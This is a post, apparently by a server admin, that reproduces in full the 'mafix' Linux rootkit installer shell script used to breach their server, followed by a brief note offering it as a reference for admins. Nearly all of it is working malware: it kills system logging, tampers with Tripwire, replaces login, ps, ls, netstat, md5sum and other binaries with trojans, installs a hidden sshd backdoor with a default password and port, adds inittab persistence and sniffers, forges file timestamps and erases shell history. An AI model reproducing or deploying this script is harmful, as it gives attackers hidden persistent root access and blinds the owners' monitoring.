backdoor script used to breach one of my servers

backdoor.sh

#!/bin/bash
######################
# mafix 0.2          #
# fud 2009/07/15     #
######################

BASEDIR=`pwd`
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
BLK=''
MAG=''
CYN=''
RED='^[[1;32m'
DMAG=''
RES=''

echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"
echo "${CYN}     /__/\         /  /\         /  /\   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"
echo "${CYN}    |  |::\       /  /::\       /  /:/_  ${DMAG}  /  /\    ${CYN}    |  |:|    ${RES}"
echo "${CYN}    |  |:|:\     /  /:/\:\     /  /:/ /\ ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"
echo "${CYN}  __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ ${DMAG}/__/::\    ${CYN}  __|__|:|    ${RES}"
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}"
echo "${CYN} \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/   ${DMAG}   \  \:\/\ ${CYN}   ~\~~\::::/${RES}"
echo "${CYN}  \  \:\        \  \::/       \  \::/    ${DMAG}    \__\::/${CYN}     |~~|:|~~ ${RES}"
echo "${CYN}   \  \:\        \  \:\        \  \:\    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"
echo "${CYN}    \  \:\        \  \:\        \  \:\   ${DMAG}    \__\/  ${CYN}     |  |:|   ${RES}"
echo "${CYN}     \__\/         \__\/         \__\/   ${DMAG}           ${CYN}     |__|/    ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}		- the ferrari of rootkits - ${RES}"
sleep 5
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
tar zxf mafixlibs
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
   exit
fi
cd $BASEDIR
sleep 1
killall -9 syslogd >/dev/null 2>&1
startime=`date +%S`

echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
		echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
        echo
        for host in $REMOTE; do
                echo -n "            "
                echo $host
        done
        echo
        echo ' ${CYN}coz this box is logging to it${RES}'
        echo
else
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"
fi
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
	echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"
	if [ -f /var/lib/tripwire/$uname.twd ]; then
      chattr -isa $twd
   else
	echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"
   fi
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"
fi
# restoring login
if [ -f /sbin/xlogin ]; then
   chattr -isa /sbin/xlogin
   chattr -isa /bin/login
   mv -f /sbin/xlogin /bin/login
   chmod 7455 /bin/login
   chattr +isa /bin/login
fi
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"
if [ -f /etc/sh.conf ]; then
  chattr -isa /etc/sh.conf
  rm -rf /etc/sh.conf
fi
# checking if we got needed libs and filez
if [ ! -f /lib/libproc.a ]; then
   mv bin/lib/libproc.a /lib/ 2>/dev/null
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
   mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null
fi
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"
/sbin/ldconfig >/dev/null 2>&1

if [ ! -f /usr/bin/md5sum ]; then
   touch -acmr /bin/ls bin/md5sum
   cp bin/md5sum /usr/bin/md5sum
fi
DEFPASS=race
DEFPORT=11111
if test -n "$1" ; then
   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"
   cd $BASEDIR/bin
   echo -n $1|md5sum > /etc/sh.conf
else
   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"
   echo -n $DEFPASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n "$2" ; then
   echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"
   echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
   echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
   echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
else
   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"
   echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
  
   echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
   echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
fi

if [ -f /lib/lidps1.so ]; then
  chattr -isa /lib/lidps1.so
  rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
  chattr -isa /usr/include/hosts.h
  rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
  chattr -isa /usr/include/file.h
  rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
  chattr -isa /usr/include/log.h
  rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
  chattr -isa /usr/include/proc.h
  rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/bin/headers/*
mv $BASEDIR/bin/headers/*  /usr/include/ 2>/dev/null

# Ok lets start creating dirs

SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then
   chattr -isa /lib/libsh.so
   chattr -isa /lib/libsh.so/*
   rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
   chattr -isa /usr/lib/libsh
   chattr -isa /usr/lib/libsh/*
   rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR 2>/dev/null
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR 2>/dev/null
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/ 2>/dev/null
mv .sh/.bashrc $HOMEDIR 2>/dev/null

if [ -f /sbin/ttyload ]; then
   chattr -AacdisSu /sbin/ttyload
   rm -rf /sbin/ttyload
fi

if [ -f /usr/sbin/ttyload ]; then
   chattr -isa /usr/sbin/ttyload
   rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
   chattr -isa /sbin/ttymon
   rm -rf /sbin/ttymon
fi

mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null
chmod a+xr /sbin/ttyload 2>/dev/null
chmod o-w /sbin/ttyload 2>/dev/null
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null
chmod a+xr /sbin/ttymon 2>/dev/null
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

# INITTAB SHUFFLING

chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# modem getty." >> /tmp/.init1
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# fax getty (hylafax)" >> /tmp/.init1
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# vbox (voice box) getty" >> /tmp/.init1
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# end of /etc/inittab" >> /tmp/.init1
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload 2>/dev/null
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab 2>/dev/null
rm -rf /tmp/.init2

# MAKING SURE WE GOT IT BACKDORED RIGHT !

if [ ! "`grep ttyload /etc/inittab`" ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"
fi

# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then
   /usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
   /usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
   /usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
   /usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
   /usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
   /usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
   /usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
   /usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
   /usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
   /usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi


if [ ! -f /dev/srd0 ]; then
  ./encrypt -e .shmd5 /dev/srd0
  touch -acmr /bin/ls /dev/srd0
  chattr a+r /dev/srd0
  chown -f root:root /dev/srd0
fi

rm -rf .shmd5


# time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1


# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP 2>/dev/null

# ps ...
if [ -f /usr/bin/ps ]; then
   chattr -isa /usr/bin/ps
   cp /usr/bin/ps $BACKUP
   mv -f ps /usr/bin/ps 2>/dev/null
   chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
   chattr -isa /bin/ps
   cp /bin/ps $BACKUP
   mv -f ps /bin/ps 2>/dev/null
   chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig 2>/dev/null
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
  chattr -isa /usr/sbin/netstat
  mv -f netstat /usr/sbin/netstat 2>/dev/null
  chattr +isa /usr/sbin/netstat
fi

chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat 2>/dev/null
chattr +isa /bin/netstat

# top ...
if [ -f /usr/bin/top ]; then
   chattr -isa /usr/bin/top
   cp /usr/bin/top $BACKUP
   mv -f top /usr/bin/top 2>/dev/null
   chattr +isa /usr/bin/top
   if [ -f /lib/libncurses.so.5 ]; then
      ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
   fi
   if [ -f /usr/lib/libncurses.so.5 ]; then
      ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
   fi
fi

# slocate ...
if [ -f /usr/bin/slocate ]; then
   chattr -isa /usr/bin/slocate
   cp /usr/bin/slocate $BACKUP
   mv -f slocate /usr/bin/slocate 2>/dev/null
   chattr +isa /usr/bin/slocate
fi

# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls 2>/dev/null
chattr +isa /bin/ls

# find ...
if [ -f /usr/bin/find ]; then
   chattr -isa /usr/bin/find
   cp /usr/bin/find $BACKUP
   mv -f find /usr/bin/find 2>/dev/null
   chattr +isa /usr/bin/find
fi

# dir ...
if [ -f /usr/bin/dir ]; then
   chattr -isa /usr/bin/dir
   cp /usr/bin/dir $BACKUP
   mv -f dir /usr/bin/dir 2>/dev/null
   chattr +isa /usr/bin/dir
fi

# lsof ...
if [ -f /usr/sbin/lsof ]; then
   chattr -isa /usr/sbin/lsof
   cp /usr/sbin/lsof $BACKUP
   mv -f lsof /usr/sbin/lsof 2>/dev/null
   chattr +isa /usr/sbin/lsof
fi

# pstree ...
if [ -f /usr/bin/pstree ]; then
   chattr -isa /usr/bin/pstree
   cp /usr/bin/pstree $BACKUP
   mv -f pstree /usr/bin/pstree 2>/dev/null
   chattr +isa /usr/bin/pstree
fi

# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum 2>/dev/null
chattr +isa /usr/bin/md5sum
	echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"

cd $BASEDIR

mkdir $HOMEDIR/.sniff 2>/dev/null
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null
chmod +x $BASEDIR/bin/sshd 2>/dev/null
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide
chmod +x $HOMEDIR/.sniff/* 2>/dev/null
chmod +x $HOMEDIR/shsb 2>/dev/null
chmod +x $HOMEDIR/hide 2>/dev/null
./bin/sshd $1 $2 >> /dev/null
   echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"
ps aux > /tmp/.procs

if [ "`cat /tmp/.procs | grep named`" ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"
fi

if [ -f /usr/sbin/wu.ftpd ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"
fi

if [ "`cat /tmp/.procs | grep smbd`" ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"
fi

if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"
fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then
   echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"
fi

rm -rf /tmp/.stats


# CHECKING FOR HOSTILE ROOTKITS/BACKDORS


mkdir $HOMEDIR/.owned 2>/dev/null

if [ -f /etc/ttyhash ]; then
   chattr -AacdisSu /etc/ttyhash
   rm -rf /etc/ttyhash
fi

if [ -d /lib/ldd.so ]; then
   chattr -isa /lib/ldd.so
   chattr -isa /lib/ldd.so/*
   mv /lib/ldd.so $HOMEDIR/.owned/tk8
   echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"
fi

if [ -d /usr/src/.puta ]; then
   chattr -isa /usr/src/.puta
   chattr -isa /usr/src/.puta/*
   mv /usr/src/.puta $HOMEDIR/.owned/tk7
   echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"
fi

if [ -f /usr/sbin/xntpd ]; then
   chattr -isa /usr/sbin/xntpd
   rm -rf /usr/sbin/xntpd
fi

if [ -f /usr/sbin/nscd ]; then
   chattr -isa /usr/sbin/nscd
   rm -rf /usr/sbin/nscd
fi

if [ -d /usr/include/bex ]; then
   chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
   chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
   chattr -isa /usr/include/bex
   chattr -isa /usr/include/bex/*
   mv /usr/include/bex/ $HOMEDIR/.owned/bex2
   if [ -f /var/log/tcp.log ]; then
      chattr -isa /var/log/tcp.log
      cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
   fi
   chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
   rm -rf /usr/bin/sshd2 >/dev/null 2>&1
   echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"
fi

if [ -d /dev/tux/ ]; then
   chattr -isa /usr/bin/xsf >/dev/null 2>&1
   rm -rf /usr/bin/xsf >/dev/null 2>&1
   chattr -isa /usr/bin/xchk >/dev/null 2>&1
   rm -rf /usr/bin/xchk >/dev/null 2>&1
   chattr -isa /dev/tux >/dev/null 2>&1
   mv /dev/tux $HOMEDIR/.owned/tuxkit
   echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"
fi

if [ -f /usr/bin/ssh2d ]; then
   chattr -isa /usr/bin/ssh2d
   rm -rf /usr/bin/ssh2d
   chattr -isa /lib/security/.config/
   chattr -isa /lib/security/.config/*
   rm -rf /lib/security/.config
   echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"
fi

if [ -f /etc/ld.so.hash ]; then
   chattr -isa /etc/ld.so.hash
   rm -rf /etc/ld.so.hash
fi


chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so

# GREPPING SHITZ FROM rc.sysinit and inetd.conf

if [ -f /etc/rc.d/rc.sysinit ]; then
   chattr -isa /etc/rc.d/rc.sysinit
   cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/usr/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep
   chmod +x /tmp/.grep
   touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
   mv -f /tmp/.grep /etc/rc.d/rc.sysinit
   rm -rf /tmp/.grep
fi

if [ -f /etc/inetd.conf ]; then
   chattr -isa /etc/inetd.conf
   cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep
   touch -acmr /etc/inted.conf /tmp/.grep
   mv -f /tmp/.grep /etc/inetd.conf
   rm -rf /tmp/.grep
fi


# KILLING SOME LAMME DAEMONS

killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1


   echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print  $11 }' >/tmp/info_tmp
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+-  Might be ["`/sbin/ifconfig | grep \eth | wc -l`" ] active adapters.${RES}"

if [ -f /etc/redhat-release ]; then
    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"
elif [ -f /etc/slackware-version ]; then
    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"
elif [ -f /etc/debian_version ]; then
    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"
elif [ -f /etc/SuSE-release ]; then
    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"
elif [ -f /etc/issue ]; then
    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"
fi
echo
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
if [ -f /.bash_history ]; then
   chattr -isa /.bash_history >/dev/null 2>&1
   rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
   chattr -isa /bin/.bash_history
   rm -rf /bin/.bash_history
fi
cd $BASEDIR
rm -rf /tmp/.r*
cd ..
rm -rf mafix*
echo -n "${CYN}done!${RES}"
echo
rm -rf /tmp/info_tmp
endtime=`date +%S`
echo
echo
echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"
echo "${CYN}     /__/\         /  /\         /  /\   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"
echo "${CYN}    |  |::\       /  /::\       /  /:/_  ${DMAG}  /  /\    ${CYN}    |  |:|    ${RES}"
echo "${CYN}    |  |:|:\     /  /:/\:\     /  /:/ /\ ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"
echo "${CYN}  __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ ${DMAG}/__/::\    ${CYN}  __|__|:|    ${RES}"
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}"
echo "${CYN} \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/   ${DMAG}   \  \:\/\ ${CYN}   ~\~~\::::/${RES}"
echo "${CYN}  \  \:\        \  \::/       \  \::/    ${DMAG}    \__\::/${CYN}     |~~|:|~~ ${RES}"
echo "${CYN}   \  \:\        \  \:\        \  \:\    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"
echo "${CYN}    \  \:\        \  \:\        \  \:\   ${DMAG}    \__\/  ${CYN}     |  |:|   ${RES}"
echo "${CYN}     \__\/         \__\/         \__\/   ${DMAG}           ${CYN}     |__|/    ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}    	        	      Password: $1                                        ${RES}"
echo "${DMAG}   		                  Port: $2                                        ${RES}"

if [ -f /usr/sbin/syslogd ]; then
   /usr/sbin/syslogd -m 0
else
   /sbin/syslogd -m 0
fi

if [ -f /usr/sbin/inetd ]; then
   killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
   killall -HUP xinetd
fi

please note that I've included this script here as a reference for potential security violations.

I in no way intend to use a script like this to compromise any server resource.

this file is interesting however for linux server admins attempting to close security violations

note the tripwire check